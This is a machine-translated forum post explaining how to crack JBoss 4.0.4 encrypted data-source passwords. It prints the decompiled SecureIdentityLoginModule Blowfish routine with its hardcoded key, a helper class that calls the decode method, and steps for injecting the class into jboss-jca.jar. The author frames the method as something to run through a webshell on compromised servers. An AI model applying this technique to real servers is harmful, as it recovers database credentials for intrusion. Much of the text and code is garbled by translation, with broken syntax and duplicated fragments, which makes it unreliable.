I used JDgui and read the decryption methods of the predecessors. I have never succeeded.
In jboss, data source passwords can be encrypted. There are many related articles. Here I will talk about how to crack them.
Jboss-4.0.4.GA as an example, the principle of decryption is very simple, first find the method used for encryption:
Java-cp "xxx. jar ...... "Org. jboss2.resource. security. SecureIdentityLoginModule 13456 Encryption Method
Okay, find the package jboss-jca.jar where SecureIdentityLoginModule is located, and find SecureIdentityLoginModule. class, a slight decompilation is completely clear. encryption uses: private static String encode (String secret), which is naturally decrypted:
private static char[] decode(String secret) private static String encode(String secret) throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException { byte[] kbytes = "jaas is the way".getBytes(); SecretKeySpec key = new SecretKeySpec(kbytes, "Blowfish"); Cipher cipher = Cipher.getInstance("Blowfish"); cipher.init(1, key); byte[] encoding = cipher.doFinal(secret.getBytes()); BigInteger n = new BigInteger(encoding); return n.toString(16); } private static char[] decode(String secret) throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException { byte[] kbytes = "jaas is the way".getBytes(); SecretKeySpec key = new SecretKeySpec(kbytes, "Blowfish"); BigInteger n = new BigInteger(secret, 16); byte[] encoding = n.toByteArray(); Cipher cipher = Cipher.getInstance("Blowfish"); cipher.init(2, key); byte[] decode = cipher.doFinal(encoding); return new String(decode).toCharArray(); } public static void main(String[] args) throws Exception { String encode = encode(args[0]); System.out.println("Encoded password: " + encode); } }
Okay, encryption and decryption parameters. The most important thing is how to execute the code in webshell. I read the decryption code of Daniel's door. I tested it online. It's not successful. I don't know if it's a castrated version.
Byte [] kbytes = "jaas is the way". getBytes ()The key point is that the previous Daniel came out in July.
Now I am talking about my 2B stupid method. You can try it. The code on the first page of DU Niang is all biased. I sorted it out.
Create a file
Jboss-4.0.4.GA \ server \ default \ lib \ A. java, content:
Package org. jboss. resource. security; what I cannot understand is the meaning of function A. Directly paste the code and class A {public static void main (String args []) throws Exception {SecureIdentityLoginModule seq = new SecureIdentityLoginModule (); char [] decode = seq. decode (args [0]); System. out. println ("Haha, DEcoded password:" + new String (decode ));}}
Create a file
Create another file
SecureIdentityLoginModule.java:package org.jboss.resource.security; SecureIdentityLoginModule.java: package org.jboss.resource.security; class SecureIdentityLoginModule{ static String encode(String s){ return s; } static char[] decode(String s){ return new char[100]; } }
This SecureIdentityLoginModule can be compiled separately, and then put the compiled SecureIdentityLoginModule. class into \ jboss-4.0.4.GA \ server \ default \ lib \ org \ jboss \ resource \ security
Last step, add the compiled A. class to the jboss-jca.jar package (back up before doing something bad ).
Call method:
Java-cp "D: \ jboss-4.0.4.GA \ lib \ jboss-jmx.jar; D: \ jboss-4.0.4.GA \ lib \ jboss-common.jar; D: \ jboss-4.0.4.GA \ server \ default \ lib \ jboss-jca.jar; D: \ jboss-4.0.4.GA \ server \ default \ lib \ jbosssx. jar; D: \ jboss-4.0.4.GA \ server \ default \ lib \ jboss-jca.jar "org. jboss. resource. security. A encrypted string linux is directly to D into/home/jboss-4.0.4.GA \ lib \ jboss-jmx.jar; wait, I will package these four files to the local directory directly. Assume that the java environment can be used. It's all common.
I didn't use the directly compiled file to leave this post. I can also help you with it if you need it.